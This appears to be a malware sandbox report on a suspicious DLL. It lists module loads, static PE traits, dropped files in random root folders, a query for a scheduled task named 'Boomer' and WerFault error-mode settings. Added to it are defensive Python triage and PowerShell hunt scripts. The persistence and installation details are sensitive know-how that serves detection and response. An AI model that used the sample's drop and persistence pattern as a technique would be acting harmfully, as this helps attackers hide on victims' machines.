Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
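
The per-process module lists above are long, and the entries do not all carry the same weight. The Python below is an added example, not part of the report: it parses lines in the report's own "Source: <process> Section loaded: <module>" shape (a constructed subset of the entries above is embedded), groups modules per process, and applies two rules a responder would want. For ybtrrus.exe it collects capability hints (HTTP and socket libraries, the third-party unrar.dll and 7zxa.dll, the WMI client library wbemcomn.dll, wtsapi32.dll for session enumeration, amsi.dll) and flags the random-looking directory directly under the drive root it runs from. For netsh.exe, schtasks.exe and ipconfig.exe it refuses to draw conclusions from the module list: netsh loads every helper DLL registered under HKLM\SOFTWARE\Microsoft\NetSh when it starts, whatever context the command line uses, so the authfwcfg.dll and firewallapi.dll entries do not by themselves prove a firewall change; the command line is the evidence. The capability labels and the 8-12 letter directory heuristic are my own assumptions, not part of the report.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the "Section loaded" entries in this report,
# enough to exercise every rule below.
SAMPLE_LINES = r"""
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wininet.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wsock32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: uxtheme.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: unrar.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: 7zxa.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: winhttp.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wtsapi32.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: wbemcomn.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: dnsapi.dll
Source: C:\iDQiPwFWUp\ybtrrus.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
"""

LINE_RE = re.compile(r"^Source:\s+(?P<proc>\S+)\s+Section loaded:\s+(?P<mod>\S+)$")

# Modules whose presence says something about what a process can do (assumed labels).
CAPABILITIES = {
    "wininet.dll": "http client", "winhttp.dll": "http client",
    "wsock32.dll": "raw sockets", "dnsapi.dll": "dns resolution",
    "unrar.dll": "rar extraction", "7zxa.dll": "7z extraction",
    "wbemcomn.dll": "wmi client", "wtsapi32.dll": "session enumeration",
    "amsi.dll": "amsi.dll loaded",
    "taskschd.dll": "task scheduler com", "firewallapi.dll": "firewall config",
    "authfwcfg.dll": "netsh advfirewall helper",
}
ARCHIVE_DLLS = {"unrar.dll", "7zxa.dll"}

# netsh loads every helper registered under HKLM\SOFTWARE\Microsoft\NetSh at
# start-up regardless of the context used, and schtasks/ipconfig/cmd load a
# fixed support set. Their module lists prove nothing; the command line does.
LOADS_FIXED_SET = {"netsh.exe", "schtasks.exe", "ipconfig.exe", "cmd.exe"}

# Heuristic (assumption): a binary in an 8-12 letter directory directly under the
# drive root, as C:\iDQiPwFWUp\ybtrrus.exe and C:\pnVcakKiqh\ybtrrus.exe are here.
RANDOM_ROOT_DIR = re.compile(r"^[A-Za-z]:\\[A-Za-z]{8,12}\\[^\\]+$")


def parse(text):
    """Map each process path to the set of module names it loaded (lower-cased)."""
    loaded = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            loaded[m.group("proc")].add(m.group("mod").lower())
    return loaded


def triage(text):
    """Return {process: {"hints": [...], "flags": [...]}} for report lines in text."""
    report = {}
    for proc, mods in parse(text).items():
        exe = proc.rsplit("\\", 1)[-1].lower()
        hints = sorted({CAPABILITIES[m] for m in mods if m in CAPABILITIES})
        flags = []
        if exe in LOADS_FIXED_SET:
            flags.append("module list not discriminative: pivot to the command line")
        else:
            if hints:
                flags.append("capabilities: " + ", ".join(hints))
            if ARCHIVE_DLLS & mods:
                flags.append("third-party archive DLLs loaded: check they were dropped next to the binary")
        if RANDOM_ROOT_DIR.match(proc):
            flags.append("runs from a random-looking directory directly under the drive root")
        report[proc] = {"hints": hints, "flags": flags}
    return report


if __name__ == "__main__":
    for proc, info in triage(SAMPLE_LINES).items():
        print(proc)
        for flag in info["flags"]:
            print("   -", flag)
```

Feed it the whole "Section loaded" block of a report rather than the embedded subset to get the full per-process picture; the netsh caveat is the part worth remembering, since an analyst who reads firewall helper DLLs as proof of a firewall change will over-report on every netsh invocation.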
Source: C:\iDQiPwFWUp\ybtrrus.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: T8TY28UxiT.dll Static PE information: Virtual size of .text is bigger than: 0x100000
Source: T8TY28UxiT.dll Static file information: File size 2714112 > 1048576
Source: T8TY28UxiT.dll Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1cc000
Source: T8TY28UxiT.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: T8TY28UxiT.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: g2m.pdb source: rundll32.exe, 0000000C.00000002.1908516008.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1962876857.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, T8TY28UxiT.dll
Source: Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: rundll32.exe, 0000000C.00000003.1880320269.000000000316E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934185341.0000000004D87000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000001C.00000002.2706441073.000000006FE65000.00000002.00000001.01000000.00000008.sdmp, ybtrrus.exe, 00000021.00000002.2704695699.000000006EA25000.00000002.00000001.01000000.0000000C.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6927E0 DllMain,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_6C6927E0
Source: 7zxa.dll.12.dr Static PE information: section name: .didata
Source: 7zxa.dll.19.dr Static PE information: section name: .didata
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00592EC8 push ebx; iretd 1_2_00592EC9
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00592ECB push 516C8D2Ch; iretd 1_2_00592ED9
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00592EF8 push ebp; iretd 1_2_00592EF9
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00592EE8 push edi; iretd 1_2_00592EE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_034CC1C8 push eax; iretd 4_2_034CC1C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6EEDFE pushfd ; retf 12_2_6C6EEE01
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6EEF74 push esi; retf 12_2_6C6EEF77
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_009FC308 push esp; ret 15_2_009FC30D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_02DAC458 push eax; retf 18_2_02DAC4AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_02DAC567 pushad ; retf 18_2_02DAC56D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_0089C917 push eax; retf 20_2_0089C921
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE5DE65 push ecx; ret 28_2_6FE5DE78
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05457764 push ecx; mov dword ptr [esp], eax 28_2_05457765
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_0545D148 push ecx; mov dword ptr [esp], edx 28_2_0545D149
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_054608F8 push ecx; mov dword ptr [esp], eax 28_2_054608FD
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05461FC8 push ecx; mov dword ptr [esp], edx 28_2_05461FC9
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05461FB0 push ecx; mov dword ptr [esp], edx 28_2_05461FB1
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05461E76 push ecx; mov dword ptr [esp], edx 28_2_05461E79
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05461E18 push ecx; mov dword ptr [esp], edx 28_2_05461E19
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05461E24 push ecx; mov dword ptr [esp], edx 28_2_05461E25
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05461E30 push ecx; mov dword ptr [esp], edx 28_2_05461E31
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05461E9C push ecx; mov dword ptr [esp], edx 28_2_05461E9D
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05461EBE push ecx; mov dword ptr [esp], edx 28_2_05461EC1
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05461BDC push ecx; mov dword ptr [esp], edx 28_2_05461BDD
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05464D34 push ecx; mov dword ptr [esp], edx 28_2_05464D36
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05464FDC push ecx; mov dword ptr [esp], ecx 28_2_05464FE1
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_054647E6 push ecx; mov dword ptr [esp], eax 28_2_054647E9
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_0546508A push ecx; mov dword ptr [esp], ecx 28_2_05465091
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05465396 push ecx; mov dword ptr [esp], edx 28_2_05465399
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05464B9C push ecx; mov dword ptr [esp], edx 28_2_05464B9D
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05479884 push ecx; mov dword ptr [esp], ecx 28_2_05479888
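
The code-function entries above are instruction-pattern hits of two different kinds, and they deserve different readings. The Python below is an added example, not the report's or the sample's code: it sweeps a constructed byte buffer modelled on those entries and labels each match. A push followed by ret, retf or iretd (the loaddll32.exe and rundll32.exe entries) is what a linear sweep reports when it disassembles data, tables or padding as code, so each hit should be checked for whether it lies in an executable section and is ever reached. A push ecx followed by mov dword ptr [esp], reg (the ybtrrus.exe entries) is the idiom Delphi and C++Builder compilers emit to reserve a 4-byte stack slot before storing an argument or local; the .didata section on the dropped 7zxa.dll is that toolchain's delay-import section, which fits. The opcode encodings are standard x86; the buffer contents are constructed and are not bytes taken from the sample.

```python
# Single-byte push opcodes 0x50..0x57 map to eax, ecx, edx, ebx, esp, ebp, esi, edi.
PUSH_REG = dict(zip(range(0x50, 0x58), ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]))
RETURNS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}
# mov dword ptr [esp], reg encodes as 89 /r with ModRM mod=00 rm=100 and SIB 0x24;
# the ModRM byte selects the source register.
MOV_ESP_REG = {0x04: "eax", 0x0C: "ecx", 0x14: "edx", 0x1C: "ebx", 0x2C: "ebp", 0x34: "esi", 0x3C: "edi"}

KINDS = {
    "push-ret": "push followed by ret/retf/iretd: usually data or a table swept as code; "
                "confirm the bytes sit in an executable section and are actually reached",
    "delphi-idiom": "push ecx; mov [esp], reg: Delphi/C++Builder reserves a 4-byte stack slot "
                    "this way before storing a value; a compiler idiom, not obfuscation",
}


def push_at(buf, i):
    """(length, mnemonic) if buf[i] begins a push instruction, else None."""
    op = buf[i]
    if op in PUSH_REG:
        return 1, "push " + PUSH_REG[op]
    if op == 0x60:
        return 1, "pushad"
    if op == 0x9C:
        return 1, "pushfd"
    if op == 0x68 and i + 5 <= len(buf):
        return 5, "push 0x%08x" % int.from_bytes(buf[i + 1:i + 5], "little")
    if op == 0x6A and i + 2 <= len(buf):
        return 2, "push 0x%02x" % buf[i + 1]
    return None


def scan(buf):
    """Return [(offset, mnemonic, kind)] for every match. Steps one byte at a time
    when nothing matches, so, like the sandbox's own sweep, it can fire inside
    immediates or data; that is exactly why push-ret hits need verification."""
    hits, i = [], 0
    while i < len(buf):
        p = push_at(buf, i)
        if p is None:
            i += 1
            continue
        n, text = p
        j = i + n
        if j < len(buf) and buf[j] in RETURNS:
            hits.append((i, f"{text}; {RETURNS[buf[j]]}", "push-ret"))
            i = j + 1
        elif (buf[i] == 0x51 and j + 3 <= len(buf) and buf[j] == 0x89
              and buf[j + 1] in MOV_ESP_REG and buf[j + 2] == 0x24):
            hits.append((i, f"push ecx; mov dword ptr [esp], {MOV_ESP_REG[buf[j + 1]]}", "delphi-idiom"))
            i = j + 3
        else:
            i += 1
    return hits


# Constructed buffer modelled on the entries above (not the sample's real bytes).
SAMPLE = bytes.fromhex(
    "55 8b ec"            # push ebp; mov ebp, esp     ordinary prologue, no hit
    "51 89 04 24"         # push ecx; mov [esp], eax   cf. 28_2_05457764
    "51 89 14 24"         # push ecx; mov [esp], edx   cf. 28_2_0545D148
    "68 2c 8d 6c 51 cf"   # push 0x516c8d2c; iretd     cf. 1_2_00592ECB
    "53 cf"               # push ebx; iretd            cf. 1_2_00592EC8
    "9c cb"               # pushfd; retf               cf. 12_2_6C6EEDFE
    "54 c3"               # push esp; ret              cf. 15_2_009FC308
    "c3"                  # ret
)

if __name__ == "__main__":
    for off, mnem, kind in scan(SAMPLE):
        print(f"+0x{off:02x}  {mnem:<40} {KINDS[kind]}")
```

Run over a real section (for example the .text bytes of a dumped module), the push-ret list is the one to triage by cross-referencing each offset against the disassembler's function boundaries; the Delphi-idiom list mostly confirms the toolchain and can be set aside.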

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\iDQiPwFWUp\7zxa.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\pnVcakKiqh\7zxa.dll

Boot Survival

Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05468BF6 IsIconic, 28_2_05468BF6
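
The SCHTASKS /Query /TN "Boomer" call above, together with the 7zxa.dll drops under C:\iDQiPwFWUp\ and C:\pnVcakKiqh\ in the Persistence and Installation Behavior section and the netsh firewall activity recorded earlier, gives a responder concrete artefacts to look for on other hosts. The PowerShell below is an added hunt script, not part of the report; run it elevated on a suspect machine. It assumes the task is registered under the exact name "Boomer", that any firewall rule references ybtrrus.exe by program path, and that the drop directory is an 8-12 letter name directly under a drive root; the report shows the query and the drops but not the commands that created either, so those three points are assumptions.

```powershell
# Added hunt script (not part of the report). Run elevated on a suspect host.
# Assumptions: task name is exactly "Boomer"; a firewall rule, if present,
# names ybtrrus.exe by path; the drop directory is an 8-12 letter name directly
# under a drive root, as C:\iDQiPwFWUp and C:\pnVcakKiqh are in this report.

$findings = New-Object 'System.Collections.Generic.List[object]'

# 1. The scheduled task the sample checks for with SCHTASKS /Query /TN "Boomer".
$task = Get-ScheduledTask -TaskName 'Boomer' -ErrorAction SilentlyContinue
if ($task) {
    $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    $findings.Add([pscustomobject]@{
        Type = 'ScheduledTask'; Item = "$($task.TaskPath)$($task.TaskName)"; Detail = $actions
    })
}

# 2. Random-looking root-level directories holding the dropped set; hash every
#    file there so it can be matched against the report's dropped-file hashes.
$droppedNames = @('ybtrrus.exe', '7zxa.dll', 'unrar.dll')
Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Root -match '^[A-Z]:\\$' } | ForEach-Object {
    Get-ChildItem -Path $_.Root -Directory -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -cmatch '^[A-Za-z]{8,12}$' } |
        ForEach-Object {
            $dir = $_.FullName
            $present = $droppedNames | Where-Object { Test-Path -LiteralPath (Join-Path $dir $_) }
            if ($present) {
                foreach ($f in Get-ChildItem -LiteralPath $dir -File -Force) {
                    $hash = (Get-FileHash -LiteralPath $f.FullName -Algorithm SHA256).Hash
                    $findings.Add([pscustomobject]@{ Type = 'DroppedFile'; Item = $f.FullName; Detail = $hash })
                }
            }
        }
}

# 3. Firewall rules that name the binary. netsh advfirewall writes the same
#    policy store the NetSecurity cmdlets read, so a rule added via netsh shows here.
Get-NetFirewallApplicationFilter -ErrorAction SilentlyContinue |
    Where-Object { $_.Program -like '*\ybtrrus.exe' } |
    Get-NetFirewallRule |
    ForEach-Object {
        $findings.Add([pscustomobject]@{
            Type = 'FirewallRule'; Item = $_.DisplayName
            Detail = "$($_.Direction) $($_.Action) Enabled=$($_.Enabled) Profile=$($_.Profile)"
        })
    }

# 4. Task registration events (ID 106), available only if the TaskScheduler
#    operational log is enabled on the host.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-TaskScheduler/Operational'; Id = 106 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'Boomer' } |
    ForEach-Object {
        $findings.Add([pscustomobject]@{ Type = 'TaskRegistered'; Item = $_.TimeCreated; Detail = ($_.Message -split "`n")[0] })
    }

if ($findings.Count -eq 0) { Write-Output 'None of the artefacts from this report were found on this host.' }
else { $findings | Format-Table -AutoSize -Wrap }
```

A negative result from step 1 is not clean: the sample only queries the task in the lines above, so a host may carry the dropped files without the task, which is why step 2 hashes everything in a matching directory rather than only the three expected names.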
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
